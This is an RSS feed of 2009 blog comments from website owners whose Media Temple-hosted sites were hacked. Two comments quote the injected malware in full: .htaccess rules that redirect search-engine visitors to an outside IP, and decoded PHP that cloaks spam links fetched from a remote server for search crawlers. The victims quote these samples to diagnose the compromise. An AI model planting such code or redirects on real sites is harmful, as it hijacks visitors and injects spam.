<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Site hacked &#8211; media temple&#8217;s reaction.</title>
	<atom:link href="http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/</link>
	<description>arduino, robots, cameras, and life</description>
	<lastBuildDate>Sun, 05 Sep 2010 15:56:02 -0700</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
	<item>
		<title>By: Kerri</title>
		<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/comment-page-1/#comment-1273</link>
		<dc:creator>Kerri</dc:creator>
		<pubDate>Wed, 25 Nov 2009 19:38:15 +0000</pubDate>
		<guid isPermaLink="false">http://blog.tinyenormous.com/?p=967#comment-1273</guid>
		<description>One of my client&#039;s sites was hacked, too, and I&#039;m no expert on internet security, but I do believe that there was nothing in the code that could have been exploited.  This site used NO CMS, was and coded, had no forms, and the only PHP in was used for includes (headers, footers, etc.) and to parse a static XML file.    This one seems to be totally on Media Temple.</description>
		<content:encoded><![CDATA[<p>One of my client&#8217;s sites was hacked, too, and I&#8217;m no expert on internet security, but I do believe that there was nothing in the code that could have been exploited.  This site used NO CMS, was and coded, had no forms, and the only PHP in was used for includes (headers, footers, etc.) and to parse a static XML file.    This one seems to be totally on Media Temple.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Phil</title>
		<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/comment-page-1/#comment-1267</link>
		<dc:creator>Phil</dc:creator>
		<pubDate>Wed, 25 Nov 2009 00:02:01 +0000</pubDate>
		<guid isPermaLink="false">http://blog.tinyenormous.com/?p=967#comment-1267</guid>
		<description>Yep I was hacked too, all sites on my account had .htaccess changed or added :

AddHandler php-script .html .htm
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://91.207.4.19/tds/go.php?sid=1 [R,L]

And also ALL index.html and links.html files across all accounts had been changed.

On speaking with a tech at MT he was very hesitant to even mention the word hack or admit the fact, and only confirmed what I knew and would not explain anything at all. This is all very fishy!</description>
		<content:encoded><![CDATA[<p>Yep I was hacked too, all sites on my account had .htaccess changed or added :</p>
<p>AddHandler php-script .html .htm<br />
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm<br />
RewriteEngine On<br />
RewriteOptions inherit<br />
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]<br />
RewriteRule .* <a href="http://91.207.4.19/tds/go.php?sid=1" rel="nofollow">http://91.207.4.19/tds/go.php?sid=1</a> [R,L]</p>
<p>And also ALL index.html and links.html files across all accounts had been changed.</p>
<p>On speaking with a tech at MT he was very hesitant to even mention the word hack or admit the fact, and only confirmed what I knew and would not explain anything at all. This is all very fishy!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Andreas</title>
		<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/comment-page-1/#comment-1265</link>
		<dc:creator>Andreas</dc:creator>
		<pubDate>Tue, 24 Nov 2009 09:16:36 +0000</pubDate>
		<guid isPermaLink="false">http://blog.tinyenormous.com/?p=967#comment-1265</guid>
		<description>My media temple sites were hacked too last night.
Got the same php code added to my index.php files, but the code never worked. Instead all requests returned with an error, which is not much better...</description>
		<content:encoded><![CDATA[<p>My media temple sites were hacked too last night.<br />
Got the same php code added to my index.php files, but the code never worked. Instead all requests returned with an error, which is not much better&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: fwitz</title>
		<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/comment-page-1/#comment-1262</link>
		<dc:creator>fwitz</dc:creator>
		<pubDate>Mon, 23 Nov 2009 18:52:30 +0000</pubDate>
		<guid isPermaLink="false">http://blog.tinyenormous.com/?p=967#comment-1262</guid>
		<description>I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed. There&#039;s no way the FTP passwords could have all been hacked.

The encoded PHP evaluates to this:

if(stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;google&#039;) or stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;yahoo&#039;) or stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;msn&#039;) or stripos($_SERVER[&#039;HTTP_USER_AGENT&#039;], &#039;live&#039;))
{
  $r = &#039;&#039;;
  if($f=@fsockopen(&#039;91.207.4.18&#039;,80,$e,$er,10) and @fputs($f, &quot;GET /linkit/in.php?domain=&quot; . urlencode($_SERVER[&quot;SERVER_NAME&quot;]) . &quot;&amp;useragent=&quot; . urlencode($_SERVER[&#039;HTTP_USER_AGENT&#039;]) . &quot; HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n&quot;))
  while( $l = fread($f, 1024)) $r .= $l;
  @fclose($f);
  $p=strpos($r,&quot;\r\n\r\n&quot;); echo substr($r,$p+4);
}</description>
		<content:encoded><![CDATA[<p>I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed. There&#8217;s no way the FTP passwords could have all been hacked.</p>
<p>The encoded PHP evaluates to this:</p>
<p>if(stripos($_SERVER['HTTP_USER_AGENT'], &#8216;google&#8217;) or stripos($_SERVER['HTTP_USER_AGENT'], &#8216;yahoo&#8217;) or stripos($_SERVER['HTTP_USER_AGENT'], &#8216;msn&#8217;) or stripos($_SERVER['HTTP_USER_AGENT'], &#8216;live&#8217;))<br />
{<br />
  $r = &#8221;;<br />
  if($f=@fsockopen(&#8217;91.207.4.18&#8242;,80,$e,$er,10) and @fputs($f, &#8220;GET /linkit/in.php?domain=&#8221; . urlencode($_SERVER["SERVER_NAME"]) . &#8220;&amp;useragent=&#8221; . urlencode($_SERVER['HTTP_USER_AGENT']) . &#8221; HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n&#8221;))<br />
  while( $l = fread($f, 1024)) $r .= $l;<br />
  @fclose($f);<br />
  $p=strpos($r,&#8221;\r\n\r\n&#8221;); echo substr($r,$p+4);<br />
}</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: cam</title>
		<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/comment-page-1/#comment-1208</link>
		<dc:creator>cam</dc:creator>
		<pubDate>Thu, 19 Nov 2009 12:41:46 +0000</pubDate>
		<guid isPermaLink="false">http://blog.tinyenormous.com/?p=967#comment-1208</guid>
		<description>In the meantime, whilst sitting tight, all our sites have porn links on them. Great!</description>
		<content:encoded><![CDATA[<p>In the meantime, whilst sitting tight, all our sites have porn links on them. Great!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Andrew</title>
		<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/comment-page-1/#comment-1196</link>
		<dc:creator>Andrew</dc:creator>
		<pubDate>Thu, 19 Nov 2009 03:16:16 +0000</pubDate>
		<guid isPermaLink="false">http://blog.tinyenormous.com/?p=967#comment-1196</guid>
		<description>Happened to me. Three less-than-important Drupal sites. I began evacuating the grid months ago.</description>
		<content:encoded><![CDATA[<p>Happened to me. Three less-than-important Drupal sites. I began evacuating the grid months ago.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Andrew</title>
		<link>http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/comment-page-1/#comment-1187</link>
		<dc:creator>Andrew</dc:creator>
		<pubDate>Wed, 18 Nov 2009 19:29:24 +0000</pubDate>
		<guid isPermaLink="false">http://blog.tinyenormous.com/?p=967#comment-1187</guid>
		<description>We definitely appreciate the update.</description>
		<content:encoded><![CDATA[<p>We definitely appreciate the update.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
